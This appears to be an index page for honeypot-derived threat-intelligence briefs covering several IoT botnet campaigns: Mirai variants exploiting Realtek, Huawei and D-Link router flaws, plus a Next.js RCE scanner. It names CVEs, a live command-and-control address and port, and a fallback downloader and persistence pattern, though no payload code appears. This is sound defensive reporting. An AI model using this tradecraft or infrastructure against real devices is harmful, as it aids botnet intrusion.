Campaign briefs and adversary profiles derived from the cowrAI distributed honeypot fleet — 36 nodes across 7 providers.
Three concurrent campaigns: Flylegit 14-arch IoT worm (t.me/flylegit) with active honeypot evasion and 0/72 VT detections; Frosty Mirai targeting Realtek with live C2 confirmed across 14 sandbox detonations; and a Next.js Server Actions RSC prototype-pollution RCE scanner.
Opportunistic IoT DDoS botnet exploiting two 2014–2017 SOAP RCE CVEs across Realtek and Huawei CPE devices. Campaign observed across all 36 fleet nodes over 31 days. Self-replication args confirm the Mirai distribution-on-compromise lineage.
Active IoT botnet exploiting D-Link DSL-2750B HNAP command injection and Realtek miniigd UPnP SOAP RCE (CVE-2014-8361) across 9 architectures. Dual binary naming convention (kaizen.* / kwari.*) suggests split infrastructure or evolving rebranding. C2 confirmed at 185.234.100.154:2310 via sandbox detonation.
Mirai-lineage botnet with the widest architecture coverage observed on fleet (11+ arches including SPARC, SH4/Renesas, m68k, PowerPC). SSH brute-force entry with a four-fallback downloader (wget → busybox wget → curl → busybox curl) and dual-location persistence via /dev/shm and /var. Distribution path /bachekuni/ unique; no prior public reporting.
Each brief is derived from live honeypot data collected by the cowrAI fleet — 36 cowrie nodes running SSH, Telnet, and alt-protocol lures (soaplure, httplure, adbhoney, and others). All lure-captured payloads are automatically submitted to VirusTotal and tria.ge; confirmed samples are detonated in an isolated WARP-egress sandbox for behavioral analysis.
Reports include: IOC tables, MITRE ATT&CK mappings, Suricata detection rules, raw exploit payload captures, and C2 infrastructure profiling. Distribution frequency: as-observed (one brief per distinct campaign or threat actor).